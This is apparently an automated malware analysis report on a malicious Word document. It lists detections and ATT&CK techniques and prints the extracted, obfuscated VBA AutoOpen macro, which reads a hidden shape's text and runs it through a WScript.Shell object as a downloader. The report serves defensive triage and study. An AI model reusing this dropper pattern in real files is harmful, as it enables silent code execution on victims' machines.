MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.003 Windows Command Shell
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function that attempts to execute a highly obfuscated command. This command appears to construct and run a PowerShell command to download and execute a second-stage payload from a remote URL. The presence of the `cmd.exe` invocation and the obfuscated nature of the command strongly suggest a downloader or dropper functionality.
Heuristics 9
-
ClamAV: Doc.Malware.Powload-6813870-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6813870-0
-
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set bfIKKuI = GetObject(sWzWXMSI + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + BpPHSnVYJ) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6097 bytes |
SHA-256: 7847b43fba7dcf9cfb7c0fc55c9418156fc1959f77e921bc0c4d76dce6a93b57 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
102 of 163 identifiers look randomly generated (e.g. 'NLMPGANATmYQ') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NLMPGANATmYQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case iKTOciszh
Case 45985471
FPbpt = 21874628
QBCjFSm = CLng(203469733)
Case 184538627
HdjuUVbj = Oct(qRbdFXPR)
NHUJa = LIqzFBc
Case 325598872
HsDaI = CDate(tzIFNLoX)
LpAfRUQzD = Int(71584852 * LfbbmNUY)
End Select
On Error Resume Next
Select Case EKXzcmTM
Case 83761720
aiPSolG = 151004253
aomzGXbS = CLng(249060251)
Case 270952365
urpBmBW = Oct(WSPYGW)
FwWbZimvu = RKRaATiXj
Case 237000209
sOfmPtAV = CDate(QjdPRd)
KPuIvuGUr = Int(33667943 * VwhAWmHM)
End Select
On Error Resume Next
Select Case nMmQopiS
Case 127838003
jzFjfkN = 118011559
jLwNJ = CLng(259691284)
Case 225166846
mAJONzd = Oct(UjjDZWQY)
HMrcZJc = EqYrwccF
Case 127063817
SJKVzczKE = CDate(OhNvYlB)
quNrhfJ = Int(45191263 * sVDGz)
End Select
Set zOSlMPc = Shapes("ukCIsbaRsAAdFc")
On Error Resume Next
Select Case zHOZJ
Case 191259502
tpFipF = 14731536
dVCSiXTk = CLng(168009887)
Case 107955366
RUkfLLl = Oct(liwhqAi)
JUYzXuS = TNutdjXp
Case 62684513
LzIJuTEa = CDate(DfoMSz)
JPAREWBEM = Int(332074737 * rBEKJX)
End Select
On Error Resume Next
Select Case hhwXm
Case 257919450
TrUZEbE = 316507397
fJtLmoGjo = CLng(303689462)
Case 134936929
PwhjYSi = Oct(kaXjqvjzZ)
HGqjvPPQ = tbSisS
Case 334864719
vnsfI = CDate(CIEmNVq)
JHFnO = Int(238468544 * ASRHzpRS)
End Select
VwzGAmpk = "" + OzaFuwd + iActd + osdoz + zOSlMPc.TextFrame.TextRange.Text + vCMZMsWQ + UkJpvWH
On Error Resume Next
Select Case nZHKsnk
Case 187485526
YSzqZi = 125863223
cJKFVKmj = CLng(278640972)
Case 135345463
kjdiaWk = Oct(GIzilS)
bwwWoYMFY = MXRPUdC
Case 126551216
rjuoZU = CDate(KMccbZma)
piTjwYaF = Int(20790940 * wSDmiz)
End Select
On Error Resume Next
Select Case NbWHjPb
Case 17938493
CrWMj = 196554140
ZfRmj = CLng(167685107)
Case 178717545
zlQGjvLh = Oct(mHtkSOPk)
ENKLz = CdzSrRqo
Case 5385905
KzwVTLrKo = CDate(YkUHQBB)
VNVlnfDG = Int(330714115 * pQwTstIRR)
End Select
Set bfIKKuI = GetObject(sWzWXMSI + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + BpPHSnVYJ)
On Error Resume Next
Select Case FpwAJtB
Case 214035387
FHUXoE = 246239110
Ornoj = CLng(327686778)
Case 122608792
QWKJPPnvX = Oct(KJXaNwRF)
QLbFDqf = KSoZsdK
Case 291525183
qWzpTZz = CDate(tciod)
XbYCipQGT = Int(240147753 * ddjJSfNi)
End Select
On Error Resume Next
Select Case TLzDi
Case 209993582
VqpjFpME = 235615500
jjupnc = CLng(206130063)
Case 146521999
oqnwfFuu = Oct(kbtjZCQmj)
zDBLM = AOBMfiTh
Case 314698920
thsKaLvPU = CDate(XAJrY)
wXWim = Int(202915500 * JiqshQB)
End Select
Const aqKdDc = 0
On Error Resume Next
Select Case BZitbM
Case 282266177
WumYDFnic = 338577405
MGcnDbm = CLng(272081948)
Case 7126579
jVNDpJmwo = Oct(titLiO)
RnqGFt = CEYmaS
Case 271032713
pwmZZUO = CDate(AinlfdNRI)
MUBKsdbA = Int(8653768 * kAVWYWtv)
End Select
On Error Resume Next
Select Case bIdqNBO
Case 11396923
TfbutJi = 312875351
GzvjvXX = CLng(179179205)
Case 9027108
VmHcdzzM = Oct(nYHIaD)
VIfkY = dHuwdvN
Case 40738771
mAifpM = CDate(zwtzP)
zwpUc = Int(279791305 * PwRLA)
End Select
On Error Resume Next
Select Case dtcXjQ
Case 26157511
NpPHQ = 175622204
jpLAvYn = CLng(168439811)
Case 101576679
loEKKlz = Oct(FqkiccB)
HXcdw = rqdiJKYv
Case 274879967
Nzwbzq = CDate(ERdLk)
wMiznRQzm = Int(187361467 * zNhjc)
End Select
bfIKKuI.Run@ VwzGAmpk, aqKdDc
On Error Resume Next
Select Case akulsl
Case 146773979
lbHSvY = 66888400
hjwrFB = CLng(187037285)
Case 15044243
uFwiFZWz = Oct(IilvTiw)
DWwURS = KfQjN
Case 53135399
IsBzfZc = CDate(CkUTPcim)
PvozGG = Int(105200013 * muYZInk)
End Select
On Error Resume Next
Select Case ZRRkhKk
Case 162864993
BilCVIi = 253217804
mnVpT = CLng(9177140)
Case 286817386
lcFoLCXv = Oct(oAMUGWZ)
XTAczv = wzXUzkzP
Case 292735914
YHThqjNGr = CDate(iafjQw)
whrJohZ = Int(280145282 * fCvtqk)
End Select
On Error Resume Next
Select Case RAHWHHA
Case 65253938
jQZOPzWXv = 339259433
GtTAQq = CLng(141708577)
Case 284187735
LMZpb = Oct(wZfdlr)
hQKNj = iMwwh
Case 299501595
XhGGQm = CDate(zfWqj)
wBzrRNTD = Int(78477970 * pDKUM)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.